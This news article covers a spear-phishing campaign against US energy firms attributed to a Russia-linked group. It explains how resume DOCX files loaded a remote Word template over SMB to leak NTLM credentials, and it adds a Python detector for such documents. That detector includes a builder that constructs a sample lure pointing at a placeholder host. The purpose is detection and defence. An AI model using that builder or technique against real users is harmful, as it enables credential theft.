Last week, the media was abuzz with apocalyptic headlines about how Russian hackers were launching cyber-attacks on the US energy and nuclear sector.
All the hoopla started when news broke about a joint alert sent by the Department of Homeland Security and the Federal Bureau of Investigation, which warned companies in the energy sector to be on the lookout for increased hacking activity.
Attacks pinned on Russia-linked group
According to the New York Times, the publication that first broke the story, a cyber-espionage group believed to be based in Russia was behind the attacks.
The report pinned the attacks on a group codenamed Energetic Bear, also referenced in other security reports as Dragonfly or Crouching Yeti. This group has been active since 2010 and has a history of targeting organizations in the energy sector since at least 2014.
One of the targets listed in the joint DHS and FBI alert was the Wolf Creek nuclear power plant in Burlington, Kansas. The NYT didn’t mention the nature of the cyber-attacks but said the alert received the second-highest security rating for the sensitivity of the threat.
“Cyber-attacks” were spear-phishing emails
Many feared these attacks were similar to the one that crippled Ukraine’s energy distribution network in the winter of 2015 and 2016. Those attacks were carried out using the BlackEnergy and Industroyer malware, respectively.
The severity of the “cyber-attacks” was clarified late on Friday night, when Cisco’s Talos security division released more details about what happened.
According to Cisco, the attacks were basic spear-phishing attempts. Since May 2017, the Energetic Bear group had been sending a wave of emails to companies in the energy sector. The emails were disguised as people submitting CVs and resumes in the form of DOCX files.
DOCX file used sneaky trick to harvest local credentials
Cisco says that an initial analysis of these DOCX files almost fooled their researchers into thinking that nothing was wrong, as the files contained no macros or other exploit code.
It was only by accident that they noticed an interesting status message in the loading screen of Microsoft Office.
The status message helped researchers realize that the DOCX file was secretly loading a Word template from a remote server. A Word document records its attached template as a relationship inside the archive (a .docx is a ZIP file), and here that relationship pointed outside the local machine. Further sleuthing revealed that the malicious DOCX file was trying to establish a connection to a remote SMB server.
By making a victim’s computer connect to a remote SMB server, the attackers exploited the fact that Windows will try to authenticate to that server automatically, sending the logged-in user’s NTLM challenge-response. The captured hash can be cracked offline to recover the password or relayed to other hosts on the victim’s network. No exploit or user interaction beyond opening the document is needed. This is an old trick, used in many attacks in the past.
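The following script is an added example, not code from Cisco Talos or from the original article: it shows how an analyst can check a DOCX for the technique described above by unzipping it and reading the relationship parts under word/_rels/, flagging any attached-template (or other non-hyperlink external) relationship whose target names a remote host via a UNC path, a file:// URL with a host component, or http(s)/ftp. The sample document it inspects is constructed in memory; the 203.0.113.5 address and the resume.dotm file name are placeholders, not indicators from the real campaign.

```python
"""Detect remote-template ("template injection") relationships in a DOCX.

A .docx is a ZIP archive.  Word stores an attached template as a Relationship
element in word/_rels/settings.xml.rels with TargetMode="External".  When the
Target names another host (UNC path or file://host/...), Windows authenticates
to that host over SMB as soon as the document opens, leaking the user's NTLM
challenge-response.  Added example; assumes only the Python standard library.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def is_remote_target(target):
    """True when Word would have to contact another host to fetch target."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return True                     # UNC path: \\host\share\file.dotm
    u = urlparse(t)
    scheme = u.scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return True
    if scheme == "file":
        # file:///C:/Users/.../Normal.dotm has an empty netloc and stays local;
        # file://203.0.113.5/share/x.dotm names a host and goes out over SMB.
        return bool(u.netloc) and not re.fullmatch(r"[A-Za-z]:", u.netloc)
    return False


def find_remote_templates(docx_bytes):
    """Return [(part_name, relationship_type, target)] for every external
    relationship in word/_rels/*.rels that points at a remote location.
    Hyperlinks are skipped: they are only fetched when the user clicks them."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                rel_type = rel.get("Type", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if rel_type.endswith("/hyperlink"):
                    continue
                if external and is_remote_target(target):
                    hits.append((name, rel_type.rsplit("/", 1)[-1], target))
    return hits


def build_sample_docx(template_target):
    """Build a minimal, constructed .docx in memory whose settings.xml.rels
    carries an attached-template relationship pointing at template_target.
    This is not a real captured sample; only the parts the detector reads,
    plus the bare minimum for a valid archive, are present."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>'
        '</Relationships>' % (RELS_NS, ATTACHED_TEMPLATE, template_target)
    )
    settings_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/settings.xml", settings_xml)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


# Constructed targets: one SMB/UNC-style leak, one file://host leak, one benign
# local template reference of the kind Word writes for Normal.dotm.
UNC_TARGET = "\\\\203.0.113.5\\share\\resume.dotm"
FILE_HOST_TARGET = "file://203.0.113.5/share/resume.dotm"
LOCAL_TARGET = "file:///C:/Users/alice/AppData/Roaming/Microsoft/Templates/Normal.dotm"

if __name__ == "__main__":
    for label, target in (("unc", UNC_TARGET), ("file-host", FILE_HOST_TARGET),
                          ("local", LOCAL_TARGET)):
        print(label, find_remote_templates(build_sample_docx(target)))
```

Run against a real document with `find_remote_templates(open("resume.docx", "rb").read())`. A hit means the file will make an outbound connection at open time; a UNC or file://host target in particular means an SMB authentication attempt to that host, so the host is a network indicator worth hunting for in proxy and firewall logs.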
Outcome of the attacks is unknown
Despite their findings, Cisco says that most of the infrastructure and servers involved in these attacks were already down by the time they started analyzing the threat, showing that the attackers moved quickly to cover their tracks.
While the Cisco Talos research has helped clarify the severity of the cyber-attacks reported by the NYT last week, these aren’t to be taken lightly.
These attacks may have been basic reconnaissance operations, but their success is currently unknown, and all targeted organizations must make sure to change all their internal credentials. Because the technique only needs the victim’s machine to reach an attacker-controlled SMB server, blocking outbound SMB (TCP port 445) at the network perimeter stops this class of credential leak regardless of who opens the document.
In addition, because the campaign’s main C&C servers were down, it is unknown whether the attackers used the collected credentials to deliver additional malware to the computers on which the emails were viewed. Affected companies should also scan local computers for any malware the malicious document might have left behind.